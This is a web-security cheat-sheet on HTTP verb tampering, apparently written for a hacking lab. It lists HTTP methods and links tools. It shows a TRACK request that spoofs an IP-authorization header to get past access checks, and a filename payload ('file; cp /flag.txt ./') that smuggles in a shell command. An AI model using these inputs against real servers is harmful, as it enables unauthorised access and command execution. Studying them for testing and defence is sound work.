HTTP Verb Tampering

WSTG - v4.1 | OWASP Foundationowasp.org

Verb	Description
HEAD	Identical to a GET request, but its response only contains the headers, without the response body
PUT	Writes the request payload to the specified location
DELETE	Deletes the resource at the specified location
OPTIONS	Shows different options accepted by a web server, like accepted HTTP verbs
PATCH	Apply partial modifications to the resource at the specified location

All methods: https://github.com/OWASP/AppSec-Browser-Bundle/blob/master/utilities/wfuzz/wordlist/fuzzdb/attack-payloads/http-protocol/http-protocol-methods.txt

OPTIONS
GET
HEAD
POST
PUT
DELETE
TRACE
TRACK
CONNECT
PROPFIND
PROPPATCH
MKCOL
COPY
MOVE
LOCK
UNLOCK
VERSION-CONTROL
REPORT
CHECKOUT
CHECKIN
UNCHECKOUT
MKWORKSPACE
UPDATE
LABEL
MERGE
BASELINE-CONTROL
MKACTIVITY
ORDERPATCH
ACL
PATCH
SEARCH
ARBITRARY

Tool

GitHub - ShutdownRepo/httpmethods: HTTP verb tampering & methods enumerationGitHub

From POST to GET - Burp

Change request method - Also works for GET to POST

Bypassing Basic Authentication

Http verb tempering: bypassing web authentication and authorization | Infosecwww.infosecinstitute.com

curl -i -X OPTIONS http://SERVER_IP:PORT/

HTTP/1.1 200 OK
Date: 
Server: Apache/2.4.41 (Ubuntu)
Allow: POST,OPTIONS,HEAD,GET
Content-Length: 0
Content-Type: httpd/unix-directory

Bypassing Security Filters

special char: test;

file; cp /flag.txt ./

Intercept the request in Burp Suite (Burp) and then use Change Request Method

OPTIONS

TRACK /upload.php HTTP/1.1

Host: dev.inlanefreight.local

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Connection: keep-alive

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

X-Custom-IP-Authorization: 127.0.0.1

Content-Length: 0

Dangerous HTTP Methods

HTTP Verbs and Their Security Risks | CyberWhiteCyberWhite

TRACE Enable

Making desync attacks easy with TRACE

Making desync attacks easy with TRACEPortSwigger Research

Misconfigured PUT Method

cat targets.txt | assetfinder -subs-only | httpx -silent -p 80,443,8080,8443,9000,9001,9002,9003 -nc  | nuclei -t severity high -silent | tee -a BugsFound.txt

https://x.com/_bughunter/status/1533534505251835909x.com

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

• The Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more

• Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them

• Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.